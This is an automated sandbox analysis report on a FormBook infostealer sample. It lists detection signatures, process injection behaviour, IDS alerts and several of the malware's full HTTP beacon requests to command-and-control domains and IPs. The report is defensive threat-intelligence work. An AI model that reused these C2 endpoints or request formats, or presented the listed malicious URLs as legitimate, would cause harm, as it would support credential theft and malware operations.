Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BalphRTkPS.exe

Overview

General Information

Sample name:BalphRTkPS.exe
renamed because original name is a hash value
Original sample name:2cfc0e37c8bb5910b2155f5585a9ad3b40582319fd2762c48fef6b25c727e929.exe
Analysis ID:1588694
MD5:e3b4ddaa99a7555532ea6b36bff69afc
SHA1:58f1b2ac036a0192d3226a321c0e6e0e8412c3fb
SHA256:2cfc0e37c8bb5910b2155f5585a9ad3b40582319fd2762c48fef6b25c727e929
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • BalphRTkPS.exe (PID: 2064 cmdline: "C:\Users\user\Desktop\BalphRTkPS.exe" MD5: E3B4DDAA99A7555532EA6B36BFF69AFC)
    • BalphRTkPS.exe (PID: 356 cmdline: "C:\Users\user\Desktop\BalphRTkPS.exe" MD5: E3B4DDAA99A7555532EA6B36BFF69AFC)
      • ikSQhwOmrrnfH.exe (PID: 280 cmdline: "C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ieUnatt.exe (PID: 2620 cmdline: "C:\Windows\SysWOW64\ieUnatt.exe" MD5: 4E9919DF2EF531B389ABAEFD35AD546E)
          • ikSQhwOmrrnfH.exe (PID: 1436 cmdline: "C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1268 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.4016477333.0000000005150000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.4014023454.0000000004D30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.2499317497.00000000015A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.4013880559.0000000004CE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.BalphRTkPS.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              6.2.BalphRTkPS.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T04:25:15.778243+010020507451Malware Command and Control Activity Detected192.168.2.649987154.12.28.18480TCP
                2025-01-11T04:25:40.057395+010020507451Malware Command and Control Activity Detected192.168.2.64999518.139.62.22680TCP
                2025-01-11T04:25:53.531690+010020507451Malware Command and Control Activity Detected192.168.2.649999104.21.112.180TCP
                2025-01-11T04:26:15.151839+010020507451Malware Command and Control Activity Detected192.168.2.650004209.74.77.10780TCP
                2025-01-11T04:26:28.320257+010020507451Malware Command and Control Activity Detected192.168.2.65000884.32.84.3280TCP
                2025-01-11T04:26:43.085552+010020507451Malware Command and Control Activity Detected192.168.2.650012154.208.202.22580TCP
                2025-01-11T04:26:56.407542+010020507451Malware Command and Control Activity Detected192.168.2.65001777.68.64.4580TCP
                2025-01-11T04:27:10.240777+010020507451Malware Command and Control Activity Detected192.168.2.650021208.91.197.2780TCP
                2025-01-11T04:27:23.657405+010020507451Malware Command and Control Activity Detected192.168.2.65002584.32.84.3280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T04:25:15.778243+010028554651A Network Trojan was detected192.168.2.649987154.12.28.18480TCP
                2025-01-11T04:25:40.057395+010028554651A Network Trojan was detected192.168.2.64999518.139.62.22680TCP
                2025-01-11T04:25:53.531690+010028554651A Network Trojan was detected192.168.2.649999104.21.112.180TCP
                2025-01-11T04:26:15.151839+010028554651A Network Trojan was detected192.168.2.650004209.74.77.10780TCP
                2025-01-11T04:26:28.320257+010028554651A Network Trojan was detected192.168.2.65000884.32.84.3280TCP
                2025-01-11T04:26:43.085552+010028554651A Network Trojan was detected192.168.2.650012154.208.202.22580TCP
                2025-01-11T04:26:56.407542+010028554651A Network Trojan was detected192.168.2.65001777.68.64.4580TCP
                2025-01-11T04:27:10.240777+010028554651A Network Trojan was detected192.168.2.650021208.91.197.2780TCP
                2025-01-11T04:27:23.657405+010028554651A Network Trojan was detected192.168.2.65002584.32.84.3280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T04:25:32.258273+010028554641A Network Trojan was detected192.168.2.64999218.139.62.22680TCP
                2025-01-11T04:25:34.806535+010028554641A Network Trojan was detected192.168.2.64999318.139.62.22680TCP
                2025-01-11T04:25:37.356586+010028554641A Network Trojan was detected192.168.2.64999418.139.62.22680TCP
                2025-01-11T04:25:45.859464+010028554641A Network Trojan was detected192.168.2.649996104.21.112.180TCP
                2025-01-11T04:25:48.426841+010028554641A Network Trojan was detected192.168.2.649997104.21.112.180TCP
                2025-01-11T04:25:51.015746+010028554641A Network Trojan was detected192.168.2.649998104.21.112.180TCP
                2025-01-11T04:26:07.351723+010028554641A Network Trojan was detected192.168.2.650001209.74.77.10780TCP
                2025-01-11T04:26:09.894738+010028554641A Network Trojan was detected192.168.2.650002209.74.77.10780TCP
                2025-01-11T04:26:12.517423+010028554641A Network Trojan was detected192.168.2.650003209.74.77.10780TCP
                2025-01-11T04:26:20.693264+010028554641A Network Trojan was detected192.168.2.65000584.32.84.3280TCP
                2025-01-11T04:26:23.244343+010028554641A Network Trojan was detected192.168.2.65000684.32.84.3280TCP
                2025-01-11T04:26:25.792206+010028554641A Network Trojan was detected192.168.2.65000784.32.84.3280TCP
                2025-01-11T04:26:34.956100+010028554641A Network Trojan was detected192.168.2.650009154.208.202.22580TCP
                2025-01-11T04:26:37.526967+010028554641A Network Trojan was detected192.168.2.650010154.208.202.22580TCP
                2025-01-11T04:26:40.085710+010028554641A Network Trojan was detected192.168.2.650011154.208.202.22580TCP
                2025-01-11T04:26:48.757175+010028554641A Network Trojan was detected192.168.2.65001477.68.64.4580TCP
                2025-01-11T04:26:51.299442+010028554641A Network Trojan was detected192.168.2.65001577.68.64.4580TCP
                2025-01-11T04:26:53.847159+010028554641A Network Trojan was detected192.168.2.65001677.68.64.4580TCP
                2025-01-11T04:27:02.189457+010028554641A Network Trojan was detected192.168.2.650018208.91.197.2780TCP
                2025-01-11T04:27:04.768880+010028554641A Network Trojan was detected192.168.2.650019208.91.197.2780TCP
                2025-01-11T04:27:07.295998+010028554641A Network Trojan was detected192.168.2.650020208.91.197.2780TCP
                2025-01-11T04:27:16.005946+010028554641A Network Trojan was detected192.168.2.65002284.32.84.3280TCP
                2025-01-11T04:27:18.571708+010028554641A Network Trojan was detected192.168.2.65002384.32.84.3280TCP
                2025-01-11T04:27:21.119975+010028554641A Network Trojan was detected192.168.2.65002484.32.84.3280TCP
                2025-01-11T04:27:29.362741+010028554641A Network Trojan was detected192.168.2.650026104.21.32.180TCP
                2025-01-11T04:27:31.902458+010028554641A Network Trojan was detected192.168.2.650027104.21.32.180TCP
                2025-01-11T04:27:34.991329+010028554641A Network Trojan was detected192.168.2.650028104.21.32.180TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.appsolucao.shop/qt4m/?9PZt=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&I8A=fF8h_X3X0TBAvira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/bsye/Avira URL Cloud: Label: malware
                Source: http://www.123hellodrive.shop/vc3u/Avira URL Cloud: Label: malware
                Source: http://www.happyjam.life/4t49/?I8A=fF8h_X3X0TB&9PZt=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs=Avira URL Cloud: Label: malware
                Source: https://www.muasamgiare.click/bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jKAvira URL Cloud: Label: malware
                Source: http://www.123hellodrive.shop/vc3u/?9PZt=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&I8A=fF8h_X3X0TBAvira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&I8A=fF8h_X3X0TBAvira URL Cloud: Label: malware
                Source: http://www.appsolucao.shop/qt4m/Avira URL Cloud: Label: malware
                Source: http://www.happyjam.life/4t49/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: BalphRTkPS.exeReversingLabs: Detection: 71%
                Source: BalphRTkPS.exeVirustotal: Detection: 68%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.BalphRTkPS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.BalphRTkPS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.4016477333.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4014023454.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2499317497.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4013880559.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2505138823.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4013556321.0000000002840000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: BalphRTkPS.exeJoe Sandbox ML: detected
                Source: BalphRTkPS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: BalphRTkPS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: ieUnAtt.pdbGCTL source: BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000002.4012118498.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ikSQhwOmrrnfH.exe, 00000007.00000002.4011664684.00000000005EE000.00000002.00000001.01000000.0000000C.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4011666816.00000000005EE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: ieUnAtt.pdb source: BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000002.4012118498.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: BalphRTkPS.exe, 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2498943742.0000000004AE1000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2504851800.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BalphRTkPS.exe, BalphRTkPS.exe, 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2498943742.0000000004AE1000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2504851800.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: pldkV.pdb source: BalphRTkPS.exe
                Source: Binary string: pldkV.pdbSHA256K source: BalphRTkPS.exe
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D8CC50 FindFirstFileW,FindNextFileW,FindClose,8_2_02D8CC50
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then xor eax, eax8_2_02D79F60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then mov ebx, 00000004h8_2_051A04E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50021 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50021 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49987 -> 154.12.28.184:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49987 -> 154.12.28.184:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50024 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50004 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49999 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50008 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50008 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50025 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50025 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49995 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49995 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50012 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50012 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50017 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50017 -> 77.68.64.45:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.aziziyeescortg.xyz
                Source: Joe Sandbox ViewIP Address: 77.68.64.45 77.68.64.45
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /vt4e/?I8A=fF8h_X3X0TB&9PZt=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+Rpmij5Ffq0kXSJKVYpR6npO/nbInFwrm8n/2iwd1ApVHfxnTP7ZY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.7261ltajbc.bondConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&I8A=fF8h_X3X0TB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.muasamgiare.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /86am/?9PZt=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6bu8d3TmiM5UZa33tCVJhgbgr0dm7+Mwsdmgoa6VRIc03dgAyFEL2o=&I8A=fF8h_X3X0TB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kkpmoneysocial.topConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /4t49/?I8A=fF8h_X3X0TB&9PZt=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.happyjam.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /vc3u/?9PZt=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&I8A=fF8h_X3X0TB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.123hellodrive.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /k6vm/?I8A=fF8h_X3X0TB&9PZt=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEnvFfogATAKvfKf2eq3ZcSrhy/qdqLc/JYZ8TgWJuF+1kS7eDlOqY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.zoomlive.liveConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
